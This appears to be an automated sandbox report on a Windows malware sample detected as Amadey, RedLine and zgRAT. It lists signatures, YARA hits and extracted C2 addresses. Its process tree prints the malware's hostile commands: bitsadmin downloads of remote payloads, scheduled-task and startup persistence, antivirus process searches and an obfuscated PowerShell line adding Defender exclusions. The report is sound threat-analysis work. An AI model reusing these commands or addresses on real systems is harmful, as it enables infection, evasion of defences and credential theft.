Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1632641
MD5:	5b1dbccb1977e33fae7e0efa78e96b49
SHA1:	fd97d5e5080b0130e21f998ed33b47997dd87d84
SHA256:	c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
Tags:	092155Amadeyexeuser-aachum
Infos:

Detection

Amadey, PureLog Stealer, RedLine, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download files via bitsadmin

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)

rapes.exe (PID: 2280 cmdline: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)

rapes.exe (PID: 5228 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)

rapes.exe (PID: 8120 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)

cmd.exe (PID: 4680 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10131261121\EDM8nAR.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fltMC.exe (PID: 1820 cmdline: fltmc MD5: 330E111C418797FC2E56F3F7E5FAAB9A)

bitsadmin.exe (PID: 6952 cmdline: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi" MD5: F57A03FA0E654B393BB078D1C60695F3)

bitsadmin.exe (PID: 852 cmdline: bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini" MD5: F57A03FA0E654B393BB078D1C60695F3)

PfOHmro.exe (PID: 6776 cmdline: "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe" MD5: 74C5934B5EC8A8907AFF69552DBAEAF7)

PfOHmro.exe (PID: 2688 cmdline: "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe" MD5: 74C5934B5EC8A8907AFF69552DBAEAF7)

PfOHmro.exe (PID: 516 cmdline: "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe" MD5: 74C5934B5EC8A8907AFF69552DBAEAF7)

PfOHmro.exe (PID: 4060 cmdline: "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe" MD5: 74C5934B5EC8A8907AFF69552DBAEAF7)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)

ReK7Ewx.exe (PID: 6536 cmdline: "C:\Users\user~1\AppData\Local\Temp\10141220101\ReK7Ewx.exe" MD5: 81791C3BF6C8D01341E77960EAFC2636)

cmd.exe (PID: 568 cmdline: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 504 cmdline: expand Ae.msi Ae.msi.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

tasklist.exe (PID: 5276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5156 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7776 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7868 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5984 cmdline: cmd /c md 789919 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 5656 cmdline: extrac32 /Y /E Deviation.msi MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3024 cmdline: findstr /V "Brian" Challenges MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3308 cmdline: cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6036 cmdline: cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Occupation.com (PID: 6072 cmdline: Occupation.com q MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 5296 cmdline: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 336 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 1708 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cmd.exe (PID: 6076 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10141511121\EDM8nAR.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fltMC.exe (PID: 888 cmdline: fltmc MD5: 330E111C418797FC2E56F3F7E5FAAB9A)

bitsadmin.exe (PID: 1504 cmdline: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi" MD5: F57A03FA0E654B393BB078D1C60695F3)

mIrI3a9.exe (PID: 2020 cmdline: "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe" MD5: C4E6239CAD71853AC5330AB665187D9F)

powershell.exe (PID: 6000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

wscript.exe (PID: 3272 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EduGeniusX.com (PID: 1568 cmdline: "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com" "C:\Users\user\AppData\Local\EduGenius Studios Co\u" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Threatname: RedLine

{"C2 url": ["101.99.92.190:40919"], "Bot Id": "Build 7"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000002.00000002.969111930.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000001.00000003.925833234.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000000.00000003.889046034.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000001.00000002.966341892.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000002.00000003.928647804.0000000005450000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2e73a:$a4: get_ScannedWallets 0x2d598:$a5: get_ScanTelegram 0x2e3be:$a6: get_ScanGeckoBrowsersPaths 0x2c1da:$a7: <Processes>k__BackingField 0x2a0ec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2bb0e:$a9: <ScanFTP>k__BackingField
0000000B.00000003.1339718622.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000B.00000002.3354500885.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: PfOHmro.exe PID: 6776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PfOHmro.exe PID: 6776	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PfOHmro.exe PID: 6776	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135a4:$a4: get_ScannedWallets 0x12557:$a5: get_ScanTelegram 0x1326a:$a6: get_ScanGeckoBrowsersPaths 0x11348:$a7: <Processes>k__BackingField 0xe8f5:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10c7c:$a9: <ScanFTP>k__BackingField
Process Memory Space: PfOHmro.exe PID: 4060	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PfOHmro.exe PID: 4060	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PfOHmro.exe PID: 4060	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x57c5a7:$a4: get_ScannedWallets 0x57b44e:$a5: get_ScanTelegram 0x57c230:$a6: get_ScanGeckoBrowsersPaths 0x57a0e1:$a7: <Processes>k__BackingField 0x577614:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x579a15:$a9: <ScanFTP>k__BackingField
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.PfOHmro.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.PfOHmro.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.PfOHmro.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
19.2.PfOHmro.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143c1:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
19.2.PfOHmro.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
16.2.PfOHmro.exe.41b4170.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.PfOHmro.exe.41b4170.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.PfOHmro.exe.41b4170.0.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
16.2.PfOHmro.exe.41b4170.0.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143c1:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
16.2.PfOHmro.exe.41b4170.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
16.2.PfOHmro.exe.41b4170.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.PfOHmro.exe.41b4170.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.PfOHmro.exe.41b4170.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
16.2.PfOHmro.exe.41b4170.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125c1:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
